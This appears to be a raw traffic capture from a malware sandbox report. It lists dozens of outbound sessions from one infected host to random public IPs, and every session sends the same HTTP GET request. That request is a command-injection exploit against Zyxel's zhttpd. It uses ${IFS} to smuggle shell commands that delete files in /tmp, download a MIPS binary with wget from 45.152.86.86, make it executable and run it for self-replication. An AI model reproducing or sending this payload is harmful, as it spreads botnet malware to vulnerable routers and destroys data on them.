                              Mar 31, 2024 08:41:56.184959888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7257192.168.2.1336994142.66.30.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.184999943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7258192.168.2.135991043.133.139.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185040951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7259192.168.2.1343960159.130.245.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185065031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7260192.168.2.1359596121.197.147.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185120106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7261192.168.2.13466644.120.92.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185141087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7262192.168.2.133480683.123.137.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185195923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7263192.168.2.134815841.147.140.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185229063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7264192.168.2.1340126200.28.134.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185256958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7265192.168.2.1354828151.211.163.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185312986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7266192.168.2.135977835.146.241.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185333967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7267192.168.2.1341700163.157.150.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185394049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7268192.168.2.1337724219.133.149.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185425997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7269192.168.2.1339446162.151.216.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185475111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7270192.168.2.135934048.248.156.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185496092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7271192.168.2.1351412222.206.151.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185528994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7272192.168.2.1342340173.174.154.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185570955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7273192.168.2.1339774165.86.128.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185627937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7274192.168.2.1353090175.39.172.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185655117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7275192.168.2.134427893.63.104.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185683012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7276192.168.2.135285463.213.50.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185728073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7277192.168.2.134226253.153.123.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185786963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7278192.168.2.1348840174.11.145.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185822964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7279192.168.2.134733461.202.203.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185858965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7280192.168.2.1356388157.75.208.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185878038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7281192.168.2.133800250.59.122.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185925961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7282192.168.2.134914843.137.142.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.185951948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7283192.168.2.134165493.40.75.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186022043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7284192.168.2.1354654200.204.60.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186052084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7285192.168.2.1335376184.87.24.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186104059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7286192.168.2.1354396206.45.131.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186162949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7287192.168.2.1348682161.221.33.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186198950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7288192.168.2.133373267.243.200.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186228037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7289192.168.2.135308241.105.202.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186285973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7290192.168.2.1356008105.141.16.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186309099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7291192.168.2.1340002129.209.45.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186358929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7292192.168.2.1343878173.133.15.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186404943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7293192.168.2.135305266.3.221.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186450958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7294192.168.2.1360624141.147.134.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186513901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7295192.168.2.135126266.152.234.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186543941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7296192.168.2.134905288.123.212.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186573982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7297192.168.2.133374440.194.150.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186638117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7298192.168.2.135394674.217.132.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186686039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7299192.168.2.134019269.93.186.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186736107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7300192.168.2.133988014.137.52.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186758041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7301192.168.2.133757020.102.191.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186801910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7302192.168.2.1351932197.221.57.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186835051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7303192.168.2.1333950120.169.215.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186872959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7304192.168.2.13416585.81.115.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186903954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7305192.168.2.135078641.6.247.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186949015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7306192.168.2.1338662167.143.110.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.186971903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7307192.168.2.1334928164.119.91.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187057018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7308192.168.2.1348370106.93.51.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187057018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7309192.168.2.1358664208.243.203.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187061071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7310192.168.2.1346366110.186.3.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187108994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7311192.168.2.1338536158.214.72.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187158108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7312192.168.2.1358922170.143.128.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187206984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7313192.168.2.133315247.14.30.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187228918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7314192.168.2.133586019.242.237.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187256098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7315192.168.2.134983663.132.147.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187304020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7316192.168.2.1335672173.232.42.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187321901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7317192.168.2.1347070178.129.121.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187350988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7318192.168.2.1355276195.62.99.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187383890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7319192.168.2.1354646112.198.65.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187441111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7320192.168.2.133527224.224.42.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187465906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7321192.168.2.134924223.47.8.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187515974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7322192.168.2.1334340155.44.249.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187568903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7323192.168.2.133793462.179.174.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187601089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7324192.168.2.134409852.100.148.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:56.187648058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7325192.168.2.1337832102.43.119.252443
                              TimestampBytes transferredDirectionData
